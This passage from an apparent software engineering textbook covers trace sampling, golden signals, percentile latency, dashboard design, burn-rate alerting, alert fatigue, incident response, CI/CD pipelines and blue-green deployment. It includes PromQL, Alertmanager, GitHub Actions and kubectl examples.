return (int(trace_id[-8:], 16) / 0xFFFFFFFF) < rate
# Tail-based sampling, expressed as policy: keep everything interesting, and a
# small sample of the boring majority for baseline comparisons.
def tail_decision(trace) -> bool:
if trace.has_error: return True # 100% of failures
if trace.duration_ms > 1000: return True # 100% of slow
if trace.attributes.get("user.tier") == "enterprise": return True
return head_sample(trace.trace_id, 0.01) # 1% baseline
# Result: near-complete coverage of what you investigate, at ~1-2% of the
# storage of keeping everything. The cost is buffering every trace until
# it completes, which is what the Collector does.
Three practical guidelines. Never sample away errors — they are the rare events you will need. Keep enough baseline that you can compare a failing trace against a healthy one, which is impossible at 0.01% sampling. And remember that metrics remain complete even when traces are sampled: rates and percentiles come from full aggregation, so heavy trace sampling does not distort your dashboards or alerts. That division of labour — complete metrics, sampled traces, targeted logs — is what makes observability affordable at scale.
Key Takeaways
- Metric cost is driven by cardinality, the multiplicative product of label value counts; one unbounded label can create millions of series.
- Never put IDs, emails, raw paths, or error messages in metric labels — put them on spans and logs instead.
- Sampling controls trace and log volume; head-based is cheap but drops errors by chance, tail-based keeps them deterministically.
- Sample errors and slow traces at 100% and keep a small baseline sample for comparison.
- Metrics stay complete under trace sampling, so alerting accuracy is unaffected — that split is what makes the total cost manageable.
🧪 Practice
- Compute the series count for a metric with four labels and identify which one you would remove or normalize.
- Configure tail-based sampling that keeps all errors, all traces over one second, and 1% of the rest, then measure the volume reduction.
- Interview: Your metrics backend fell over after a deploy that added one label. Explain what happened and how you would prevent a recurrence. (Hint: think multiplicatively, and about what a code review would have to check.)
<a id="122-monitoring-and-alerting"></a>
12.2 Monitoring and Alerting
Telemetry is only useful if it reaches a human at the right moment with the right framing. This subchapter covers which signals to watch, how to aggregate latency without lying to yourself, how to build dashboards and alerts people trust, and what happens when the page fires.
Golden Signals
Given unlimited metrics, teams instrument everything and then cannot tell which numbers matter during an incident. The golden signals are the small set that detects nearly every user-visible problem, and their value is prioritization: if you can only build four graphs per service, build these four.
- Latency — how long requests take. Crucially, measure successful and failed requests separately, because a fast-failing service can look like a fast service.
- Traffic — demand on the system: requests per second, messages consumed, concurrent sessions.
- Errors — the rate of failed requests, including the ones that return HTTP 200 with a broken body.
- Saturation — how full the constrained resource is: CPU, memory, connection pool, queue depth, disk. This is the leading indicator; the other three tell you a problem has arrived, saturation tells you it is coming.
The related frameworks are worth knowing because they suit different targets. RED (Rate, Errors, Duration) is the request-service view — essentially the golden signals minus saturation. USE (Utilization, Saturation, Errors) is the resource view, applied per resource rather than per service.
| Framework | Applies to | Signals | Best for |
|---|---|---|---|
| Golden | Any user-facing service | Latency, traffic, errors, saturation | General service health |
| RED | Request-driven services | Rate, errors, duration | Microservice dashboards |
| USE | Resources (CPU, disk, pool) | Utilization, saturation, errors | Capacity and infrastructure |
# The four signals for one service, in queries you can paste into a dashboard.
# TRAFFIC
sum(rate(http_requests_total{service="orders"}[5m]))
# ERRORS -- as a RATIO, because the raw count rises with traffic and tells you
# nothing about whether the system is healthier or sicker.
sum(rate(http_requests_total{service="orders", status=~"5.."}[5m]))
/ sum(rate(http_requests_total{service="orders"}[5m]))
# LATENCY -- successful requests only, or fast failures flatter the graph.
histogram_quantile(0.99,
sum(rate(http_request_duration_seconds_bucket{service="orders",
status!~"5.."}[5m])) by (le))
# SATURATION -- the leading indicator. Whatever runs out FIRST is the one to
# graph; for most services that is a pool or a queue, not CPU.
max(db_connection_pool_in_use / db_connection_pool_size)
sum(job_queue_depth) by (queue)
# Saturation is only meaningful against a known limit, so record both.
# A gauge of "connections in use" with no denominator cannot be alerted on.
pool_in_use = Gauge("db_connection_pool_in_use", "Connections checked out", ["pool"])
pool_size = Gauge("db_connection_pool_size", "Configured pool size", ["pool"])
def checkout_connection(pool):
conn = pool.acquire()
pool_in_use.labels(pool=pool.name).set(pool.in_use)
pool_size.labels(pool=pool.name).set(pool.size) # the denominator
return conn
# Utilization vs saturation, which are not the same thing:
# utilization = fraction of capacity in use (80% of the pool busy)
# saturation = work that could NOT be served now (requests WAITING for a
# connection)
# A pool at 100% utilization with no waiters is fine. A pool at 100% with a
# growing wait queue is an outage in progress. Instrument the wait.
pool_wait_seconds = Histogram("db_pool_wait_seconds", "Time waiting for a connection")
Two refinements make the signals genuinely useful. Measure from the user's side where you can — a server-side latency graph excludes DNS, TLS, network, and client rendering, so a service can look healthy while the product is unusable; synthetic probes and real-user monitoring close that gap. And define "error" by user impact rather than by status code: a 200 response containing an empty result set where data was expected is an error, and a 404 for a genuinely missing resource is not.
Key Takeaways
- Latency, traffic, errors, and saturation detect nearly every user-visible problem; build these before anything else.
- Measure latency for successful requests separately — fast failures otherwise improve the graph.
- Express errors as a ratio, not a count, so the signal is independent of traffic.
- Saturation is the leading indicator; instrument it against a known limit and measure waiting, not just utilization.
- Complement server-side signals with client-side or synthetic measurement, and define errors by user impact rather than status code.
🧪 Practice
- Build the four golden-signal queries for a service you know and identify which resource is its true saturation point.
- Add a wait-time histogram to a connection pool and show how it distinguishes healthy full utilization from saturation.
- Interview: A service reports 99.99% success and users are complaining. What are the possible explanations? (Hint: think about where the measurement is taken and what counts as success.)
Percentile Latency vs. Averages
Averages hide the experiences that matter. If 99 requests take 50 ms and one takes 5 seconds, the mean is 99.5 ms — a number describing nobody's experience, comfortably under a 200 ms target, while one user in a hundred waited five seconds. Latency distributions are right-skewed and often multi-modal (cache hit versus miss, warm versus cold), and the mean is a poor summary of any of them.
Percentiles describe the distribution directly: p50 is the typical experience, p99 is the bad-but-not-freak experience, and p99.9 catches the tail that hits your highest-volume customers most often. Chapter 13.1 treats tail latency as a performance-engineering problem; here the concern is measuring and aggregating it correctly, which is where most teams go wrong.
SAME MEAN, DIFFERENT SYSTEMS
A: tight distribution B: bimodal (cache hit / miss)
requests requests
| #### | #### ##
| ###### | ###### ####
| ######## |######## ######
+--------------- ms +---------------------- ms
40 50 60 20 30 400 500
mean(A) = 50 ms p99(A) = 62 ms
mean(B) = 50 ms p99(B) = 480 ms <- same average, different product
The mean cannot distinguish these. The percentile can.
# THE AGGREGATION TRAP: percentiles do not average.
# Three instances, each reporting its own p99:
per_instance_p99 = [120, 130, 900] # ms
print(sum(per_instance_p99) / 3) # 383 ms -- a number with NO meaning
# The real p99 depends on how much traffic each instance served and on the
# full distributions. It could be higher or lower than 383; the average of
# percentiles is not an estimate of anything.
#
# The correct approach: aggregate the underlying HISTOGRAM BUCKETS across
# instances first, then compute the quantile once from the merged distribution.
# WRONG: computes a p99 per instance, then averages them.
avg(histogram_quantile(0.99, rate(http_request_duration_seconds_bucket[5m])))
# RIGHT: sums the bucket counts across instances, then takes one quantile.
histogram_quantile(0.99,
sum(rate(http_request_duration_seconds_bucket[5m])) by (le))
# ^ `le` must be preserved; every other label is summed away
Which percentile to target is a product decision with cost consequences, and the answer depends on how many requests a single user experience contains.
| Percentile | Interpretation | Typical use |
|---|---|---|
| p50 | The typical request | Capacity planning, general health |
| p90 / p95 | Common bad case | Balanced SLO targets |
| p99 | Rare bad case; still frequent at scale | Standard SLO for user-facing paths |
| p99.9 | The extreme tail | High-volume APIs, paying enterprise |
| max | The single worst request | Debugging only — one outlier dominates |
The reason p99 matters more than it sounds is fan-out amplification: if one
page issues 20 backend calls, the chance that at least one lands on the p99 path
is 1 - 0.99^20, about 18%. The p99 of a dependency becomes the near-typical
experience of a page that depends on twenty of them — which is why chapter 9's
hedged requests and this chapter's percentile discipline exist.
One further caution: percentiles over long windows hide short incidents. A p99 computed over 24 hours barely moves during a ten-minute outage. Alert on short windows (five minutes), and use long windows only for SLO reporting, where the burn-rate approach in the next topic handles the interaction properly.
Key Takeaways
- Averages hide skew and cannot distinguish a tight distribution from a bimodal one; percentiles describe the distribution.
- Percentiles cannot be averaged — aggregate histogram buckets across instances first, then compute the quantile once.
- Choose the target percentile by product impact; p99 is the usual default for user-facing paths.
- Fan-out amplifies the tail: 20 parallel calls make a p99 event roughly an 18% chance per page.
- Use short windows for alerting; long-window percentiles mask brief incidents.
🧪 Practice
- Take two latency datasets with equal means and different shapes, and compute p50, p95, and p99 for each.
- Find a dashboard query that averages per-instance percentiles and rewrite it to aggregate buckets correctly.
- Interview: Your p50 is unchanged and p99 tripled. What kinds of causes fit that pattern? (Hint: think about what affects a minority of requests — a subset of instances, a cache, a lock, or one slow shard.)
Dashboard Design
A dashboard is a tool for answering questions under time pressure, and most are built as if they were art galleries — dozens of panels showing everything available, arranged by what was easy to query. During an incident that is worse than useless: the responder scrolls, hunts, and forms hypotheses from whatever panel happens to be red.
The design principle is to build dashboards around questions, in a hierarchy that supports the actual investigation path: is something wrong → what is wrong → where is it wrong → why.
A THREE-LEVEL HIERARCHY
L1 SERVICE HEALTH one screen, no scrolling, answers "are we okay?"
+---------------------------------------------------------------+
| SLO burn: 1.2x | error rate: 0.4% | p99: 240ms | RPS: 3.1k|
+---------------------------------------------------------------+
| [ error ratio, 24h ] | [ p99 latency, 24h ] |
| [ traffic, 24h ] | [ saturation, 24h ] |
+---------------------------------------------------------------+
| drill down
L2 SERVICE DETAIL by endpoint, by dependency, by instance
per-endpoint latency and errors | dependency latency | pool waits
| drill down
L3 DEBUG raw traces, logs filtered by trace_id,
per-instance resource graphs, recent deploys
Each level answers ONE question and links to the next. The alert links to
L1, L1 links to L2, L2 links to exemplar traces.
The rules that separate usable dashboards from decorative ones:
- One screen for the top level. If a responder must scroll, the layout has already failed; put the summary numbers top-left, where eyes land first.
- Every panel earns its place. If nobody can say what decision a panel informs, delete it. Unused panels dilute attention and slow queries.
- Annotate deploys and incidents. The single most common cause of a change in a graph is a change you made; overlaying deploy markers answers "what changed?" before anyone opens a ticket.
- Consistent layout across services. When every service dashboard has the same shape, responders read them without relearning, which matters at 3 a.m.
- Show the target on the graph. A latency panel with the SLO threshold drawn as a line converts "is 240 ms bad?" into a glance.
- Prefer ratios and rates over raw counts, so panels stay meaningful as traffic grows.
// A dashboard defined as code: versioned, reviewed, and reproducible across
// environments -- the same reason infrastructure is defined as code (12.4).
{
"title": "Orders Service - Health",
"templating": [
{ "name": "env", "query": "label_values(deployment_environment)" },
{ "name": "service", "query": "label_values(service_name)" }
],
"annotations": [
{ "name": "deploys",
"datasource": "prometheus",
"expr": "changes(build_info{service=\"$service\"}[5m]) > 0" }
],
"panels": [
{ "title": "SLO burn rate (1h)", "type": "stat", "gridPos": {"x":0,"y":0,"w":6,"h":4},
"targets": [{ "expr": "slo:error_budget_burn_rate_1h{service=\"$service\"}" }],
"thresholds": [ {"value": 1, "color": "yellow"}, {"value": 6, "color": "red"} ] },
{ "title": "Error ratio", "type": "timeseries", "gridPos": {"x":6,"y":0,"w":9,"h":8},
"targets": [{ "expr": "sum(rate(http_requests_total{service=\"$service\",status=~\"5..\"}[5m])) / sum(rate(http_requests_total{service=\"$service\"}[5m]))" }],
"thresholds": [ {"value": 0.01, "color": "red"} ] },
{ "title": "Latency p50/p95/p99", "type": "timeseries", "gridPos": {"x":15,"y":0,"w":9,"h":8},
"targets": [
{ "expr": "histogram_quantile(0.50, sum(rate(http_request_duration_seconds_bucket{service=\"$service\"}[5m])) by (le))", "legendFormat": "p50" },
{ "expr": "histogram_quantile(0.99, sum(rate(http_request_duration_seconds_bucket{service=\"$service\"}[5m])) by (le))", "legendFormat": "p99" }
] }
]
}
A last distinction worth holding onto: dashboards are for known unknowns — questions you anticipated well enough to build a panel for. Genuinely novel failures require ad-hoc querying over high-cardinality data, which is what tracing and log exploration are for. A team that can only look at dashboards can only diagnose failures it has already seen.
Key Takeaways
- Build dashboards around questions in a drill-down hierarchy: are we okay, what is wrong, where, why.
- Keep the top level to one screen with summary numbers first; delete panels that inform no decision.
- Annotate deploys — the most common answer to "what changed?" is a deploy.
- Use a consistent layout across services and draw SLO thresholds on the graph.
- Dashboards answer anticipated questions; novel failures need ad-hoc queries over traces and logs.
🧪 Practice
- Rebuild an existing dashboard as a three-level hierarchy and justify each surviving panel.
- Add deploy annotations and find one past incident where the correlation is visible.
- Interview: What makes a dashboard useful at 3 a.m. specifically? (Hint: think about cognitive load, consistency across services, and what a tired person can do without reading documentation.)
Alert Thresholds and Anomaly Detection
An alert should mean one thing: a human needs to do something now. Every alert that does not meet that bar erodes trust in all the others, so the design question is not "what can we detect?" but "what warrants waking someone?"
The traditional approach sets static thresholds on causes — CPU above 80%, disk above 90%, memory above some line. It fails in both directions. A service can run at 95% CPU perfectly happily, and it can be completely broken at 10% CPU. These are cause-based alerts, and they fire for conditions that may have no user impact while missing failures that do.
Symptom-based alerting inverts this: alert on what the user experiences — error rate, latency, unavailability — and use cause metrics for diagnosis rather than paging. The refinement is to tie the threshold to the SLO (chapter 9.4) through a burn rate: how fast the error budget is being consumed relative to the rate that would exhaust it exactly at period end.
# Burn rate: the rate of budget consumption relative to "on pace".
# burn_rate = observed_error_rate / error_budget_rate
# 1x -> exactly on pace to exhaust the budget at the end of the window
# 14x -> the entire 30-day budget is gone in ~2 days
def burn_rate(observed_error_ratio, slo_target):
budget = 1 - slo_target # 99.9% SLO -> 0.001 budget
return observed_error_ratio / budget
print(burn_rate(0.014, 0.999)) # 14.0 -> page now
print(burn_rate(0.0012, 0.999)) # 1.2 -> ticket, not a page
# MULTI-WINDOW, MULTI-BURN-RATE: the standard pattern. Fast burns page quickly;
# slow burns open a ticket. Requiring BOTH a long and a short window to be
# breaching suppresses single-spike false positives.
ALERT_TIERS = [
# (long window, short window, burn threshold, budget consumed, action)
("1h", "5m", 14.4, "2%", "page"), # catastrophic: ~2 days to exhaust
("6h", "30m", 6.0, "5%", "page"), # severe
("24h", "2h", 3.0, "10%", "ticket"), # notable
("72h", "6h", 1.0, "10%", "ticket"), # slow bleed
]
# Prometheus alerting rules implementing the top tier.
groups:
- name: slo
rules:
- alert: OrdersErrorBudgetFastBurn
expr: |
(
sum(rate(http_requests_total{service="orders",status=~"5.."}[1h]))
/ sum(rate(http_requests_total{service="orders"}[1h])) > 14.4 * 0.001
)
and
(
sum(rate(http_requests_total{service="orders",status=~"5.."}[5m]))
/ sum(rate(http_requests_total{service="orders"}[5m])) > 14.4 * 0.001
)
# The `and` is the point: the long window confirms it is real, the short
# window confirms it is still happening. Either alone is noisy.
for: 2m
labels: { severity: page }
annotations:
summary: "Orders burning error budget 14x -- ~2 days to exhaustion"
runbook: "https://runbooks.example.com/orders/error-budget"
dashboard: "https://grafana.example.com/d/orders-health"
Anomaly detection addresses what thresholds cannot: metrics with strong seasonal patterns, where "normal" at 3 a.m. Sunday differs from 2 p.m. Tuesday by an order of magnitude. A fixed threshold either misses a real drop at night or fires constantly during the day.
# Seasonal comparison: compare against the same time in previous weeks rather
# than against a constant. Simple, explainable, and usually sufficient.
import statistics
def seasonal_anomaly(current, same_hour_previous_weeks, sensitivity=3.0):
baseline = statistics.median(same_hour_previous_weeks) # median resists outliers
spread = statistics.median(
[abs(v - baseline) for v in same_hour_previous_weeks]) or 1e-9 # MAD
z = abs(current - baseline) / (1.4826 * spread) # robust z-score
return z > sensitivity, baseline, z
# Detecting an ABSENCE is as important as detecting a spike: orders dropping to
# zero at noon is an outage that no error-rate alert will catch, because zero
# requests produce zero errors.
print(seasonal_anomaly(0, [1200, 1150, 1300, 1250])) # (True, 1225, ~large)
Guidelines that keep an alerting system trustworthy: alert on symptoms, page
only for user impact; every alert links to a runbook (12.4) and a
dashboard; use for: durations so transient blips self-resolve; prefer
ratios to absolutes so thresholds survive growth; and treat missing data
explicitly — a metric that stops arriving usually means something worse than a
metric that crossed a line.
Key Takeaways
- Alert on symptoms the user feels, not causes like CPU; use cause metrics for diagnosis.
- Burn-rate alerting ties thresholds to the SLO: fast burns page, slow burns open tickets.
- Multi-window conditions (long confirms real, short confirms ongoing) suppress single-spike false positives.
- Use seasonal baselines for metrics with daily and weekly cycles, and alert on absence as well as excess.
- Every alert needs a runbook link, a dashboard link, and an action a human can take; alerts without one of those should be deleted.
🧪 Practice
- Compute burn rates for a 99.9% SLO at observed error ratios of 0.05%, 0.5%, and 2%, and assign each to page, ticket, or ignore.
- Write a multi-window burn-rate alert rule and test it against a replayed traffic spike.
- Interview: Why is a CPU alert usually a bad page? (Hint: think about whether a user can tell the difference, and what fraction of high-CPU moments require immediate human action.)
Alert Fatigue and Noise Reduction
Alert fatigue is the predictable outcome of alerting on too much: responders stop reading alerts carefully, start acknowledging without investigating, and eventually miss the one that mattered. It is the most common way a well-monitored system still has a long outage, and it is a systems problem rather than a discipline problem — no amount of individual attentiveness survives forty pages a night.
The measurable symptoms are useful because they turn a vague complaint into a tracked number.
| Metric | Healthy target | What a bad value means |
|---|---|---|
| Pages per on-call shift | 0–2 | Above 5, sleep and judgment degrade |
| Actionable rate | > 90% | Low means alerts are informational |
| Auto-resolving pages | Near zero | Thresholds too tight or windows short |
| Alerts with a runbook | 100% | Tribal knowledge is a single point of failure |
| Mean time to acknowledge | Stable | Rising means trust is falling |
# Audit your alerts against evidence rather than opinion. Run this monthly.
from collections import Counter
def alert_audit(alert_history):
"""alert_history: [{name, fired_at, resolved_at, acknowledged, action_taken}]"""
stats = {}
for a in alert_history:
s = stats.setdefault(a["name"], Counter())
s["fired"] += 1
if a["action_taken"]: s["actionable"] += 1
if a["resolved_at"] - a["fired_at"] < 300: s["self_resolved"] += 1
if not a["acknowledged"]: s["ignored"] += 1
for name, s in sorted(stats.items(), key=lambda kv: -kv[1]["fired"]):
actionable = s["actionable"] / s["fired"]
print(f"{name:35} fired={s['fired']:4} actionable={actionable:.0%} "
f"self_resolved={s['self_resolved']:3} ignored={s['ignored']:3}")
if actionable < 0.5:
print(" -> DELETE or downgrade: half the pages needed no action")
if s["self_resolved"] / s["fired"] > 0.3:
print(" -> widen the `for:` duration or raise the threshold")
The techniques that actually reduce volume, roughly in order of impact:
Delete alerts nobody acts on. This is the largest and most-resisted win. An alert that has fired forty times and produced zero actions is not a safety net; it is noise that hides real signals.
Alert on the symptom once, not on every cause. A database outage that pages the database alert, the connection-pool alert, the latency alert, the error-rate alert, and eight dependent services' alerts is one incident and should be one page. Inhibition rules encode that dependency explicitly.
# Alertmanager: suppress downstream noise while the root cause is firing.
inhibit_rules:
- source_matchers: [ 'alertname = DatabaseDown', 'cluster = prod' ]
target_matchers: [ 'severity =~ "page|warning"', 'cluster = prod' ]
equal: ['cluster']
# While the database is down, every dependent alert is a consequence,
# not new information. One page, not fourteen.
route:
group_by: ['alertname', 'cluster', 'service']
group_wait: 30s # collect related alerts before the first notification
group_interval: 5m # batch updates for an ongoing group
repeat_interval: 4h # do not re-page every 5 minutes for the same thing
routes:
- matchers: [ 'severity = page' ]
receiver: pagerduty
- matchers: [ 'severity = ticket' ]
receiver: jira # never wakes anyone
- matchers: [ 'severity = info' ]
receiver: slack_channel # visible, silent
Tier by urgency and route accordingly. Only "a user is being harmed now and a human must act" earns a page. Everything else is a ticket or a dashboard, and routing enforces the distinction that good intentions do not.
Make alerts self-healing where possible. If the response to an alert is always "restart the process" or "scale up", automate that and alert only when the automation fails. An alert whose runbook has one deterministic step is a script waiting to be written.
Group and deduplicate. Twenty instances failing the same check is one alert with a count, not twenty pages.
Finally, treat alert quality as ongoing work with an owner. Review pages in every retrospective, add a tuning action item whenever a page was not actionable, and give any team consistently exceeding its page budget explicit time to fix the cause — the same error-budget logic from 9.4, applied to human attention.
Key Takeaways
- Alert fatigue is a systems problem: past a handful of pages per shift, responders stop reading them and real signals get missed.
- Track actionable rate, self-resolving pages, and pages per shift; audit alerts against that evidence monthly.
- Deleting non-actionable alerts is the highest-impact fix and the most resisted.
- Use inhibition and grouping so one incident produces one page rather than a cascade of consequences.
- Route by urgency — page only for user-affecting, human-required action — and automate any response that is always the same.
🧪 Practice
- Audit a month of alert history, compute the actionable rate per alert, and propose three deletions.
- Write inhibition rules so a dependency outage suppresses its dependents' pages.
- Interview: How do you convince a team to delete alerts they feel safer having? (Hint: think about what the alert actually protects against, and what the measurable cost of keeping it has been.)
On-Call and Incident Response
On-call is the practice of having someone responsible for responding when production breaks. It exists because automated recovery cannot handle novel failures, and it is worth designing deliberately because a badly run rotation burns people out faster than almost anything else in engineering — and burned-out responders make outages longer.
A healthy rotation has recognizable properties: enough people (six to eight, so each person is on call roughly one week in seven), a sustainable page rate (the previous topic), explicit compensation or time off in lieu, follow-the-sun scheduling where the organization spans time zones so nobody is routinely woken, a secondary who is paged if the primary does not respond, and the authority to act — a responder who must wake a manager to approve a rollback is not really responding.
Incident response itself benefits from explicit roles, because the failure mode of ad-hoc response is five engineers investigating the same hypothesis while nobody talks to customers.
INCIDENT ROLES (scale them to the incident; one person may hold several)
INCIDENT COMMANDER owns the incident, not the fix. Decides, delegates,
keeps the timeline. Does NOT debug -- the moment the IC
is head-down in a terminal, nobody is coordinating.
OPERATIONS LEAD makes the changes: rollbacks, scaling, failover.
Announces every action before taking it.
COMMUNICATIONS status page, customer support, internal stakeholders.
Frees the IC from answering "any update?" every 5 min.
SCRIBE timestamps every observation, action, and decision.
This becomes the postmortem timeline (see 9.4).
THE FLOW
detect -> acknowledge -> assess severity -> assemble -> MITIGATE -> resolve
^
restore service FIRST; understand it afterwards.
Root-causing a live outage is the classic time sink.
Severity levels matter because they set the response, and they should be defined by user impact rather than by technical alarm.
| Severity | Definition | Response |
|---|---|---|
| SEV1 | Major functionality down for many users | Page immediately; all hands; exec comms |
| SEV2 | Significant degradation or a subset down | Page; dedicated responders |
| SEV3 | Minor impact, workaround exists | Business hours; ticket |
| SEV4 | No user impact; risk or cleanup | Backlog |
# Mitigation before diagnosis, encoded as an ordered checklist. Under stress,
# people follow lists better than they recall principles.
MITIGATION_LADDER = [
("Was there a recent deploy?", "roll back first, investigate after"),
("Is one region/AZ affected?", "fail over traffic away from it"),
("Is a dependency failing?", "enable the fallback or degrade the feature"),
("Is it load-related?", "shed load, scale out, tighten rate limits"),
("Is a feature flag involved?", "disable the flag"),
]
# Every rung restores users without knowing the root cause. The temptation is
# to find the bug first; the correct order is to stop the bleeding first.
def incident_record(severity, detected_at):
return {
"severity": severity,
"detected_at": detected_at, # feeds MTTD
"acknowledged_at": None,
"mitigated_at": None, # user impact ENDS here -- the number
# that matters most to users
"resolved_at": None, # full repair; often much later
"timeline": [], # (ts, actor, observation_or_action)
"customer_impact": {"users_affected": None, "requests_failed": None},
}
# Note the separation of mitigated_at from resolved_at: conflating them
# makes incidents look longer and hides how effective mitigation was.
Practices that consistently shorten incidents: declare early — the cost of declaring an incident that turns out minor is far lower than the cost of a delayed response; one communication channel so context is not split across five threads; say what you are about to do before you do it, so two people do not restart the same service simultaneously; hand off explicitly with a written state summary when a shift ends; and stop when tired — extended incidents need rotation, because fatigued responders cause secondary incidents.
Everything after mitigation — the timeline, the contributing conditions, the action items — belongs to the blameless postmortem process covered in 9.4, and the scribe's notes are what make that process cheap rather than an archaeology project.
Key Takeaways
- A sustainable rotation needs enough people, a low page rate, compensation, a secondary, and responders empowered to act without approval.
- Separate roles: the incident commander coordinates and does not debug; operations changes things; comms handles stakeholders; a scribe keeps the timeline.
- Mitigate before diagnosing — roll back, fail over, degrade, shed load — and root-cause afterwards.
- Define severity by user impact and let it drive the response.
- Track mitigated_at separately from resolved_at; declare early, communicate in one channel, announce actions before taking them, and hand off in writing.
🧪 Practice
- Write a severity matrix for a system you know with a concrete example incident at each level.
- Build a mitigation ladder of five actions that restore service without knowing the cause.
- Interview: Why should the incident commander not be the person fixing the problem? (Hint: think about what stops happening the moment that person opens a terminal and starts debugging.)
<a id="123-deployment-and-release"></a>
12.3 Deployment and Release
Every outage that is not caused by hardware or traffic is caused by a change, and most changes are deploys. This subchapter covers the pipeline that gets code to production, the strategies for swapping running versions without dropping requests, the separation of deployment from release via flags, and the two things that must always work: rolling back, and changing a schema underneath a live system.
CI/CD Pipeline Design
Continuous integration means every change is merged and verified against the main line frequently — many times a day — rather than accumulating on long-lived branches. Continuous delivery means every commit that passes verification is deployable; continuous deployment means it is actually deployed automatically. The distinction matters: delivery is a technical capability, deployment is a policy decision on top of it.
The motivation is integration risk. Two developers working for three weeks on separate branches produce a merge whose conflicts are semantic as well as textual, and the bugs surface all at once with no way to isolate which change caused what. Small, frequent, automatically verified changes invert every part of that: each deploy carries one change, so a failure points at a single suspect.
PIPELINE STAGES -- ordered by cost, cheapest failures first
commit
|
[ lint + typecheck ] seconds catches trivia before humans look
|
[ unit tests ] 1-2 min most of your coverage lives here
|
[ build artifact ] 2-5 min build ONCE, promote the same bytes
| through every environment
[ integration tests ] 5-10 min real DB, real broker, in containers
|
[ security scans ] 2-5 min dependencies (SCA), static analysis,
| secret scanning, image CVEs
[ deploy to staging ]
|
[ smoke / e2e tests ] 5-15 min a handful of critical user journeys
|
[ deploy to prod ] progressive (canary, then full -- see below)
|
[ verify in prod ] automated checks against live signals
Fast feedback is the design goal: a 45-minute pipeline gets bypassed, and a
bypassed pipeline provides no safety at all.
# The build-once, promote-many principle expressed in a pipeline.
name: deploy
on: { push: { branches: [main] } }
jobs:
build:
runs-on: ubuntu-latest
outputs:
digest: ${{ steps.push.outputs.digest }} # the immutable identity
steps:
- uses: actions/checkout@v4
- run: make lint test # fail fast, fail cheap
- id: push
run: |
IMAGE=registry.example.com/orders:${GITHUB_SHA}
docker build -t "$IMAGE" .
docker push "$IMAGE"
# Record the DIGEST, not the tag: tags are mutable, digests are not.
echo "digest=$(docker inspect --format='{{index .RepoDigests 0}}' "$IMAGE")" \
>> "$GITHUB_OUTPUT"
staging:
needs: build
steps:
- run: ./deploy.sh staging "${{ needs.build.outputs.digest }}"
- run: ./smoke-tests.sh https://staging.example.com
production:
needs: staging
environment: production # gate: approvals and secrets scoped here
steps:
# EXACTLY the same bytes that passed staging. Rebuilding for production
# means production runs something no test ever ran.
- run: ./deploy.sh production "${{ needs.build.outputs.digest }}"
- run: ./verify-slo.sh orders --window 10m --max-error-rate 0.01
The design properties that make a pipeline trustworthy:
- Build once, promote the artifact. Rebuilding per environment reintroduces the "works on staging" class of bug; the digest is the identity that travels.
- Fast enough to keep. Target under ten minutes to a deployable artifact; parallelize, cache dependencies, and shard slow test suites.
- Deterministic and reproducible. Pin dependency versions and base images so the same commit produces the same artifact next month.
- No manual steps in the path to production. Every manual step is a place to be inconsistent under pressure.
- The pipeline is the only path. If someone can
kubectl applyby hand, the gates are advisory. - Secrets scoped by environment, injected at deploy time, never in the repo (11.2).
- Every artifact traceable to a commit, and every deploy recorded — this is the "what changed?" answer your dashboards annotate with.
Two organizational notes. Trunk-based development with short-lived branches is what makes CI meaningful; long-lived branches reintroduce exactly the integration risk CI removes. And a red main branch is an emergency — if the pipeline is broken, nobody can deploy anything, including the fix for the outage you are about to have.
Key Takeaways
- CI verifies every change against the main line frequently; CD makes every passing commit deployable, and deploying automatically is a separate policy.
- Build the artifact once and promote the same digest through environments.
- Order stages cheapest-failure-first and keep the whole pipeline fast enough that nobody wants to bypass it.
- Make the pipeline the only path to production, with no manual steps and environment-scoped secrets.
- Trunk-based development with short-lived branches is what makes CI work; a broken main branch blocks even emergency fixes.
🧪 Practice
- Map an existing pipeline's stages and their durations, then reorder or parallelize to cut total time by a third.
- Convert a pipeline that rebuilds per environment into build-once-promote and describe the class of bug this eliminates.
- Interview: Why is it important that the same artifact goes to staging and production? (Hint: think about what staging is supposed to prove, and whether it proves it if the bytes differ.)
Blue-Green Deployment
Blue-green deployment runs two complete production environments. One (blue) serves all traffic; the other (green) is idle. You deploy the new version to green, verify it in a real production environment with real infrastructure, then switch all traffic at once. The previous version stays running and untouched, so rollback is switching back.
The property this buys is a fast, complete, and rehearsed rollback. Most deployment risk is not "will the new version start?" but "will it misbehave under real traffic?", and blue-green answers that with a switch you can reverse in seconds rather than a redeploy that takes minutes.
BEFORE CUTOVER AFTER (v1 kept warm)
[ router ] [ router ] [ router ]
| 100% | 100% | 100%
v v v
[ BLUE v1 ] <- live [ GREEN v2 ] [ GREEN v2 ] <- live
[ GREEN --- ] idle [ BLUE v1 ] kept warm [ BLUE v1 ] next target
Rollback = point the router back at BLUE. Seconds, not a deploy.
Cost = two full environments during the overlap.
#!/usr/bin/env bash
set -euo pipefail
LIVE=$(kubectl get service orders -o jsonpath='{.spec.selector.slot}') # blue|green
IDLE=$([[ "$LIVE" == "blue" ]] && echo green || echo blue)
echo "live=$LIVE deploying to idle=$IDLE"
kubectl set image "deployment/orders-$IDLE" app="$IMAGE_DIGEST"
kubectl rollout status "deployment/orders-$IDLE" --timeout=5m
# Verify the idle environment BEFORE it takes traffic: it is real production
# infrastructure with real dependencies, which staging never quite is.
./smoke-tests.sh "http://orders-$IDLE.internal"
# Atomic cutover: one selector change moves 100% of traffic.
kubectl patch service orders -p "{\"spec\":{\"selector\":{\"slot\":\"$IDLE\"}}}"
echo "traffic now on $IDLE"
# Watch real signals before declaring success. If these fail, switch back --
# the old environment is still running and still warm.
if ! ./verify-slo.sh orders --window 5m --max-error-rate 0.01; then
kubectl patch service orders -p "{\"spec\":{\"selector\":{\"slot\":\"$LIVE\"}}}"
echo "ROLLED BACK to $LIVE"; exit 1
fi
# Keep the old environment for at least one incident window before reusing it.
The costs and constraints are specific. Double the infrastructure during overlap, which for a large service is a real bill — mitigated by keeping the idle environment scaled down and scaling it up just before cutover. Shared state is the hard part: both environments talk to the same database, so schema changes must be compatible with both versions simultaneously (see zero-downtime migrations below), and any in-memory or sticky session state is lost at cutover unless it lives in a shared store. And the switch is all or nothing: a fault that only appears at full production load hits every user at once, which is precisely what canary releases address.
| Aspect | Blue-green | Rolling update |
|---|---|---|
| Versions live at once | Two environments, one serving | Both serving during the roll |
| Rollback speed | Seconds (switch back) | Minutes (roll back through) |
| Infrastructure cost | 2x during overlap | ~1x |
| Blast radius at cutover | 100% at once | Incremental |
| Pre-cutover testing | Full production environment | Not possible |
| DB compatibility | Must support both versions | Must support both versions |
